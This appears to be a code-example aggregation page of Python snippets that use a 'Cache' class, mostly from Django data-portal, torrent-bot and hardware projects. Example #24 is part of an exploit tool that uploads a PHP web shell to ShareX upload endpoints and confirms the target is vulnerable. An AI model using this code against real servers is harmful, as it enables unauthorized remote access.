Example #1
    def query(self, account_id, limit=21):
        """ query for last 20 records of activity lists"""

        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])
        list_key = 'activity_stream::%s' % str(account_id)
        activity_keys = c.lrange(str(list_key), 0, limit)
        r = redis.Redis(host=settings.REDIS_READER_HOST,
                        port=settings.REDIS_PORT,
                        db=settings.CACHE_DATABASES['activity_resources'])
        pipeline = r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {}  # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h.get('user_id', None)
            if user_id:
                if not users.get(user_id, None):
                    user = User.objects.get(pk=user_id)
                    users[user_id] = user
                else:
                    user = users[user_id]
                h['user_nick'] = user.nick
                h['user_email'] = user.email
                h['user_name'] = user.name

                activities.append(h)

        # if settings.DEBUG: logger.info('Returned activities %s' % str(activities))
        return activities
Example #2
class Token:
    TOKEN_KEY = "wechat_token_key"
    URL_TEMPLATE = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}"
    RESPONSE_KEY = "access_token"
    EXPIRE_KEY = "expires_in"

    cache = None

    def __init__(self):
        self.cache = Cache()

    def fetch(self):
        access_token = self.cache.get(self.TOKEN_KEY)
        if access_token is None or len(access_token) == 0:
            print("Token has been expired, try fetching new one.")
            # refresh token
            response = HttpUtils.get(url=self.URL_TEMPLATE.format(
                Config.get("app_id"), Config.get("app_secret")),
                                     return_raw=True)
            if response is not None:
                resp_json = json.loads(str(response.text))
                access_token = resp_json[self.RESPONSE_KEY]
                expire_time = resp_json[self.EXPIRE_KEY]
                print("Fetch done, " + access_token)
                self.cache.set_with_expire(self.TOKEN_KEY, access_token,
                                           expire_time)

        return access_token
Example #3
    def query(self, account_id, limit=-21):
        """ query for last 20 records of activity lists"""
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])
        list_key = 'activity_stream::%s' % str(account_id)
        activity_keys = c.lrange(str(list_key), limit, -1)
        r = redis.Redis(host='localhost', port=settings.REDIS_PORT,
            db=settings.CACHE_DATABASES['activity_resources'])
        pipeline = r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {} # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h['user_id']
            if not users.get(user_id, None):
                user = User.objects.get(pk=user_id)
                users[user_id] = user
            else:
                user = users[user_id]
            h['user_nick'] = user.nick
            h['user_email'] = user.email
                
            activities.append(h)

        return activities
Example #4
    def query(self, account_id, limit=21):
        """ query for last 20 records of activity lists"""
        if settings.DEBUG:
            logger.info("Query ActivityStreamDAO %d" % account_id)

        c = Cache(db=settings.CACHE_DATABASES["activity_resources"])
        list_key = "activity_stream::%s" % str(account_id)
        activity_keys = c.lrange(str(list_key), 0, limit)
        r = redis.Redis(
            host=settings.REDIS_READER_HOST, port=settings.REDIS_PORT, db=settings.CACHE_DATABASES["activity_resources"]
        )
        pipeline = r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {}  # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h.get("user_id", None)
            if user_id:
                if not users.get(user_id, None):
                    user = User.objects.get(pk=user_id)
                    users[user_id] = user
                else:
                    user = users[user_id]
                h["user_nick"] = user.nick
                h["user_email"] = user.email
                h["user_name"] = user.name

                activities.append(h)

        # if settings.DEBUG: logger.info('Returned activities %s' % str(activities))
        return activities
Example #5
    def control(vDelta=0.0, hDelta=0.0):
        Servo.initialize()
        if vDelta != 0:
            duty_cycle = float(Cache().get(Servo.V_DB_KEY))
            duty_cycle += vDelta
            if duty_cycle < 2.5 or duty_cycle > 12.5:
                return
            print(duty_cycle)
            Cache().set(Servo.V_DB_KEY, duty_cycle)
            Servo.vPin.ChangeDutyCycle(duty_cycle)
            time.sleep(0.02)
            Servo.vPin.ChangeDutyCycle(0)
            time.sleep(0.2)

        if hDelta != 0:
            duty_cycle = float(Cache().get(Servo.H_DB_KEY))
            duty_cycle += hDelta
            if duty_cycle < 2.5 or duty_cycle > 12.5:
                return
            print(duty_cycle)
            Cache().set(Servo.H_DB_KEY, duty_cycle)
            Servo.hPin.ChangeDutyCycle(duty_cycle)
            time.sleep(0.02)
            Servo.hPin.ChangeDutyCycle(0)
            time.sleep(0.2)
Example #6
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Example #7
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Example #8
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Example #9
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Example #10
    def create(self, account_id, user_id, revision_id, resource_type,
               resource_id, action_id, resource_title, resource_category):
        """ Create a redis-hash and then addit to a redis-lits"""
        if settings.DEBUG:
            logger.info('Create ActivityStreamDAO %d %s' %
                        (action_id, resource_title))
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%Y-%m-%d,",
                                      ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink = ""

        # TODO: check and fix all URLs.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            else:
                for plugin in DatalPluginPoint.get_plugins():
                    if (plugin.is_active() and hasattr(plugin, 'doc_type')
                            and plugin.doc_type == resource_type
                            and hasattr(plugin, 'workspace_permalink')):
                        l_permalink = plugin.workspace_permalink(revision_id)

        list_key = 'activity_stream::%s' % str(account_id)
        n = c.incr(
            "%s_counter" % list_key
        )  # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {
            "user_id": user_id,
            "revision_id": revision_id,
            "type": resource_type,
            "resource_id": resource_id,
            "action_id": action_id,
            "title": resource_title,
            "time": time,
            "resource_link": l_permalink,
            "category": resource_category
        }

        r1 = c.hmset(activity_key, activity_value)
        r2 = c.lpush(str(list_key), activity_key)
        if settings.DEBUG:
            logger.info('Saved ActivityStreamDAO {} {} {} {} {}'.format(
                str(r1), str(r2), list_key, activity_key, activity_value))
        return list_key, activity_key, activity_value
Example #11
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     return total_datasets
Example #12
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         #if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     #else:
     #    if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Example #13
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     else:
         if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Example #14
    def ignore(self, seed_id=None):
        if seed_id is None:
            # ignore all seeds @ home page
            seeds = self.crawl()

            # skip if already in cache
            seeds = list(filter(lambda x: Cache().get(x.id) is None, seeds))

            for seed in seeds:
                print("Ignore seed: " + str(seed))
                Cache().set_with_expire(seed.id, str(seed), self.ttl)
        else:
            print("Ignore seed ID: " + str(seed_id))
            Cache().set_with_expire(seed_id, "", self.ttl)
Example #15
def invoke(query, output=None):

    if not output:
        output = 'json'
        query['pOutput'] = output.upper()

    content_type = settings.CONTENT_TYPES.get(output)

    try:
        engine_domain = get_domain_with_protocol('engine')
        url = engine_domain + settings.END_POINT_SERVLET

        memcached = settings.MEMCACHED_ENGINE_END_POINT
        if memcached:
            engine_cache = memcache.Client(memcached, debug=0)
            if engine_cache:
                key = str(hash(frozenset(sorted(query.items()))))
                value = engine_cache.get(key)
                if value is None:
                    value, content_type = _request(query, url)
                    engine_cache.set(key, value, settings.MEMCACHED_DEFAULT_TTL)
                    return value, content_type
                else:
                    return value, content_type
            else:
                logger = logging.getLogger(__name__)
                logger.debug('No memcached client could be created. Dataview will be retrieved from engine.')

        return _request(query, url)

    except Exception, e:
        """ TOO much logging from here
        logger = logging.getLogger(__name__)
        logger.debug('{0}. Dataview will be retrieved from redis '.format(str(e)))
        """

        if output == 'json':
            if 'pFilter0' not in query:

                dataviews_cache = Cache(db=settings.CACHE_DATABASES['dataviews'])
                key = str(query.get('pId'))
                params = [ query[arg].decode('utf-8') for arg in sorted(query.keys()) if arg.startswith('pArgument')]
                if params:
                    key += u'::' + u':'.join(params)

                return dataviews_cache.get(key), content_type

        return None, content_type
Example #16
    def monitor(self):
        data = self.generate_data()
        now = datetime.datetime.now()
        Cache().append(self.get_bucket(), now.strftime('%y%m%d-%H:%M:%S') + self.DELIMITER + str(data))

        # if data is below/above threshold, send alert
        self.alert(data)
Example #17
    def check_and_notify(animation_id):
        bucket_name = ShuHuiWatchDog.BUCKET_NAME_PREFIX + str(animation_id)
        previous_chapter_num = Cache().get(bucket_name)
        if previous_chapter_num is None:
            previous_chapter_num = -1
        else:
            previous_chapter_num = int(previous_chapter_num)
        comic_name, current_chapter_num = ShuHuiWatchDog.get_max_chapter_num(
            animation_id)

        if current_chapter_num == ShuHuiWatchDog.INVALID_CHAPTER_NUM:
            EmailSender.send("错误:鼠绘-" + comic_name, "无法抓取最新章节号")
        elif current_chapter_num > previous_chapter_num:
            EmailSender.send("鼠绘-{0}更新啦".format(comic_name),
                             "最新章节号是" + str(current_chapter_num))
            Cache().set(bucket_name, current_chapter_num)
Example #18
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # customized strategy
        final_seeds = []
        if Config.get("mteam_strategy") == "easy":
            final_seeds = self.easy_strategy(data)
        elif Config.get("mteam_strategy") == "medium":
            final_seeds = self.medium_strategy(data)
        elif Config.get("mteam_strategy") == "hard":
            final_seeds = self.hard_strategy(data)

        # white list
        white_lists = Config.get("putao_white_list").split("|")
        for seed in data:
            for white_list in white_lists:
                if re.search(white_list, seed.title):
                    final_seeds.append(seed)
                    break

        for seed in final_seeds:
            print("Find valuable seed: " + str(seed))

        return final_seeds
Example #19
 def latest(self):
     res = dict()
     for single in Cache().get_by_range(self.get_bucket(), start=0, end=0):
         item = single.split(self.DELIMITER)
         res['title'] = item[0]
         res['data'] = float(item[1])
         break
     return res
Example #20
    def _get_names_for_unnamed_stops(self):
        """Intelligently guess stop names for unnamed stops by sourrounding
        street names and amenities.

        Caches stops with newly guessed names.

        """
        # Loop through all stops
        for stop in self.stops.values():

            # If there is no name, query one intelligently from OSM
            if stop.name == "[" + self.stop_no_name + "]":
                self._find_best_name_for_unnamed_stop(stop)
                print stop

                # Cache stops with newly created stop names
                Cache.write_data('stops-' + self.selector, self.stops)
Example #21
    def add_seed(self, seed_id):
        self.login_if_not()

        self.download_seed_file(seed_id)
        seeds = list(filter(lambda x: x.id == seed_id, self.crawl(False)))
        assert len(seeds) == 1

        SeedManager.try_add_seeds(seeds)
        Cache().set_with_expire(seeds[0].id, str(seeds[0]), 5 * 864000)
Example #22
 def __init__(self, visualization):
     self.visualization = visualization
     if isinstance(self.visualization, dict):
         self.visualization_id = self.visualization['visualization_id']
     else:
         self.visualization_id = self.visualization.visualization_id
     self.search_index = ElasticsearchIndex()
     self.logger = logging.getLogger(__name__)
     self.cache = Cache()
Example #23
 def __init__(self, datastream):
     self.datastream = datastream
     if isinstance(self.datastream, dict):
         self.datastream_id = self.datastream['datastream_id']
     else:
         self.datastream_id = self.datastream.id
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.cache = Cache()
Example #24
    def upload_shell(upload_url, form_name, secret, field_name, verbose,
                     cache_enabled):
        """ Upload shell to target site """
        res = ShareX.upload(upload_url,
                            io.BytesIO(Shell.PAYLOAD.encode()),
                            file_name=Exploit.MAGIC,
                            form_name=form_name,
                            secret=secret,
                            field_name=field_name)

        res_code = res.status_code
        res_body = res.text.strip()

        if res.status_code != 200:
            if res_code == 403:
                Logger.error('target blocked file upload. waf?')

            elif res_code == 404:
                Logger.error('file upload endpoint not found')

            else:
                Logger.error('unknown response code')

        for error in ShareX.Errors:
            if error.value['content'].lower() in res_body.lower():
                reason = error.value['reason'].lower()
                Logger.error(f'failed to upload shell: \x1b[95m{reason}')

        shell_url = Exploit.get_shell_url(res_body, upload_url)

        if not Exploit.check(shell_url):
            Logger.error('target does not appear vulnerable')

        Logger.success('php web shell uploaded')

        if verbose:
            Logger.info(f'location: \x1b[95m{shell_url}')

        if cache_enabled:
            Cache.save(upload_url, shell_url)
            Logger.success('results saved to cache')

        return shell_url
Example #25
    def action(self, data):
        if len(data) == 0:
            return

        # send email
        for seed in data:
            EmailSender.send(u"种子", str(seed))
            Cache().set_with_expire(seed.id, str(seed), 864000)

        SeedManager.try_add_seeds(data)
Example #26
    def create(self, account_id, user_id, revision_id, resource_type, resource_id, action_id, resource_title, resource_category):
        """ Create a redis-hash and then addit to a redis-lits"""
        if settings.DEBUG: logger.info('Create ActivityStreamDAO %d %s' % (action_id, resource_title))
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%Y-%m-%d,", ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink=""

        # TODO: check and fix all URLs.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            else:
                for plugin in DatalPluginPoint.get_plugins():
                    if (plugin.is_active() and hasattr(plugin, 'doc_type') and 
                        plugin.doc_type == resource_type and 
                        hasattr(plugin, 'workspace_permalink')):
                        l_permalink = plugin.workspace_permalink(revision_id)
            
        list_key = 'activity_stream::%s' % str(account_id)
        n = c.incr("%s_counter" % list_key)  # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {"user_id": user_id, "revision_id": revision_id
                        , "type": resource_type, "resource_id": resource_id
                        ,"action_id": action_id
                        , "title": resource_title, "time":time
                        , "resource_link": l_permalink
                        , "category": resource_category }

        r1 = c.hmset(activity_key, activity_value)
        r2 = c.lpush(str(list_key), activity_key)
        if settings.DEBUG: logger.info('Saved ActivityStreamDAO {} {} {} {} {}'.format(str(r1), str(r2), list_key, activity_key, activity_value))
        return list_key, activity_key, activity_value
Example #27
    def stat(self, unit="GB", update_cache=True):
        self.login_if_not()

        soup_obj = HttpUtils.get(self.site.stat_page,
                                 headers=self.site.login_headers)
        assert soup_obj is not None

        div_list = soup_obj.select(
            "table.mainouter tr td table tr td div[align='center']")
        assert len(div_list) == 1

        content = div_list[0].contents[0]
        m = re.search(u"获取(\d+.\d+)个魔力", content)
        assert m
        mp = float(m.group(1))

        span_list = soup_obj.select("#usermsglink span")
        up = HttpUtils.pretty_format(span_list[1].contents[2], unit)
        down = HttpUtils.pretty_format(span_list[1].contents[4], unit)

        prev_up = Cache().get(self.get_site_name() + "_up")
        prev_down = Cache().get(self.get_site_name() + "_down")

        if prev_up is None:
            prev_up = 0
        else:
            prev_up = float(prev_up.decode())

        if prev_down is None:
            prev_down = 0
        else:
            prev_down = float(prev_down.decode())

        delta_up = round(up - prev_up, 2)
        delta_down = round(down - prev_down, 2)
        if delta_down == 0:
            delta_ratio = "Inf"
        else:
            delta_ratio = round(delta_up / delta_down, 2)

        current_upload = round(up - down, 2)
        print(
            "%s, mp=%s, up=%s, down=%s, current=%s, delta_up=%s, delta_down=%s, delta_ratio=%s"
            % (str(time.strftime("%Y-%m-%d %H:%M:%S")), mp, up, down,
               current_upload, delta_up, delta_down, delta_ratio))

        if update_cache:
            Cache().set(self.get_site_name() + "_up", up)
            Cache().set(self.get_site_name() + "_down", down)

        return mp, up, down
Example #28
    def initialize():
        if Servo.hPin is None and Servo.vPin is None:
            if Cache().get(Servo.H_DB_KEY) is None:
                Cache().set(Servo.H_DB_KEY, 7.5)
            if Cache().get(Servo.V_DB_KEY) is None:
                Cache().set(Servo.V_DB_KEY, 7.5)

            try:
                # horizontal servo
                GPIO.setmode(GPIO.BCM)
                GPIO.setup(17, GPIO.OUT, initial=False)
                Servo.hPin = GPIO.PWM(17, 50)  # 50HZ
                Servo.hPin.start(0)
            except Exception as e:
                print(e)


            # vertical servo
            GPIO.setup(19, GPIO.OUT, initial=False)
            Servo.vPin = GPIO.PWM(19, 50)  # 50HZ
            Servo.vPin.start(0)
Example #29
 def history(self):
     res = dict()
     data = list()
     title = list()
     for single in Cache().get_by_range(self.get_bucket(), start=0, end=self.LIMIT - 1):
         item = single.decode("utf-8").split(self.DELIMITER)
         title.append(item[0])
         data.append(float(item[1]))
     data.reverse()
     title.reverse()
     res['data'] = data
     res['title'] = title
     return res
Example #30
    def action(self, candidate_seeds):
        if len(candidate_seeds) == 0:
            return

        for seed in candidate_seeds:
            self.download_seed_file(seed.id)

        success_seeds, fail_seeds = SeedManager.try_add_seeds(candidate_seeds)

        for success_seed in success_seeds:
            Cache().set_with_expire(success_seed.id, str(success_seed),
                                    5 * 864000)

        # make the failed seed cool down for some time
        for fail_seed in fail_seeds:
            cool_down_time = 3600  # 1 hour
            if fail_seed.free or fail_seed.sticky:
                cool_down_time = 300  # 5 minutes
            elif fail_seed.discount <= 50:
                cool_down_time = 1800  # 30 minutes

            Cache().set_with_expire(fail_seed.id, str(fail_seed),
                                    cool_down_time)
Example #31
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # choose customized strategy
        strategy_map = {
            "easy": self.easy_strategy,
            "medium": self.medium_strategy,
            "hard": self.hard_strategy,
            "hell": self.hell_strategy
        }
        strategy = strategy_map[Config.get(self.get_site_name() + "_strategy")]
        assert strategy is not None

        # execute customized strategy
        final_seeds = strategy(data)

        # white list
        white_lists_str = Config.get(self.get_site_name() + "_white_list")
        if white_lists_str is not None:
            white_lists = white_lists_str.split("|")
            for seed in data:
                for white_list in white_lists:
                    if re.search(white_list, seed.title):
                        final_seeds.append(seed)
                        break

        for seed in final_seeds:
            print("Find valuable seed: " + str(seed))

        return final_seeds
Example #32
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # sticky
        filtered_seeds = set(filter(lambda x: x.sticky, data))

        # white list
        white_lists = Config.get("putao_white_list").split("|")
        for seed in data:
            for white_list in white_lists:
                if re.search(white_list, seed.title):
                    filtered_seeds.add(seed)
                    break

        for seed in filtered_seeds:
            print("Add seed: " + str(seed))

        return filtered_seeds
Example #33
    def create(self, account_id, user_id, revision_id, resource_type, resource_id, action_id, resource_title):
        """ Create a redis-hash and then addit to a redis-lits"""
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%B %d, %Y", ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink=""

        # TODO: check and fix all URLs.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DASHBOARD:
                l_permalink = LocalHelper.build_permalink('dashboard_manager.action_view',
                                                          '&dashboard_revision_id=' + str(revision_id))

        list_key = 'activity_stream::%s' % str(account_id)
        n = c.incr("%s_counter" % list_key)  # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {"user_id": user_id, "revision_id": revision_id
                        , "type": resource_type, "resource_id": resource_id
                        ,"action_id": action_id
                        , "title": resource_title, "time":time
                        , "resource_link": l_permalink }

        c.hmset(activity_key, activity_value)
        c.lpush(str(list_key), activity_key)
        return list_key, activity_key, activity_value
Example #34
 def __init__(self, datastream):
     self.datastream = datastream
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.cache=Cache()
Example #35
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets, settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets, settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id), published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams, settings.REDIS_STATS_TTL)

    published_dashboards = c.get('published_dashboards_' + str(account_id))
    if not published_dashboards:
        cursor.execute("SELECT COUNT(1) as val FROM ao_dashboards d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dashboard_revisions b WHERE b.dashboard_id = d.id AND NOT EXISTS(SELECT * FROM ao_dashboard_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dashboard_id = c.dashboard_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_dashboards = row[0]
        c.set('published_dashboards_' + str(account_id), published_dashboards, settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' + str(account_id))
    if not published_visualizations:
        cursor.execute("SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id), published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations, settings.REDIS_STATS_TTL)

    return locals()
Example #36
class DatastreamHitsDAO():
    """class for manage access to Hits in DB and index"""

    doc_type = "ds"
    from_cache = False

    # cache TTL, 1 hour
    TTL = 3600

    def __init__(self, datastream):
        self.datastream = datastream
        #self.datastream_revision = datastream.last_published_revision
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """Add a hit to the datastream."""

        # TODO: temporary fix for the switch from DT to DAO.
        # The problem is that the datastream sometimes comes from a queryset and sometimes
        # from a DAO, and they are different objects.
        try:
            datastream_id = self.datastream.datastream_id
        except:
            datastream_id = self.datastream['datastream_id']

        try:
            guid = self.datastream.guid
        except:
            guid = self.datastream['guid']

        try:
            hit = DataStreamHits.objects.create(datastream_id=datastream_id, channel_type=channel_type)
        except IntegrityError:
            # is this exception correct?
            raise DataStreamNotFoundException()

        self.logger.info("DatastreamHitsDAO hit! (guid: %s)" % ( guid))

        # armo el documento para actualizar el index.
        doc={'docid':"DS::%s" % guid,
                "type": "ds",
                "script": "ctx._source.fields.hits+=1"}

        return self.search_index.update(doc)

    def count(self):
        return DataStreamHits.objects.filter(datastream_id=self.datastream['datastream_id']).count()

    def _get_cache(self, cache_key):

        cache=self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # not sure whether this check is necessary
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.datastream.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # darn! it is not in the cache
        if not hits:
            # the start date
            start_date = datetime.today() - timedelta(days=day)

            # take only the date part
            truncate_date = connection.ops.date_trunc_sql('day', 'created_at')

            qs = DataStreamHits.objects.filter(datastream=self.datastream, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = qs.extra(select={'_date': truncate_date, "fecha": 'DATE(created_at)'}).values("fecha").order_by("created_at").annotate(hits=Count("created_at"))

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())
            
            for i in hits:
                try:
                    control.remove(i['fecha'])
                except ValueError:
                    pass

            hits=list(hits)
                
            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k['fecha']) 

            # convert the dates to ISO format
            hits = map(self._date_isoformat, hits)

            # kindly leave the result in the cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row['fecha']=row['fecha'].isoformat()
        return row
Example #37
 def __init__(self, datastream):
     self.datastream = datastream
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.logger=logging.getLogger(__name__)
     self.cache=Cache()
Example #38
class VisualizationHitsDAO:
    """class for manage access to Hits in DB and index"""

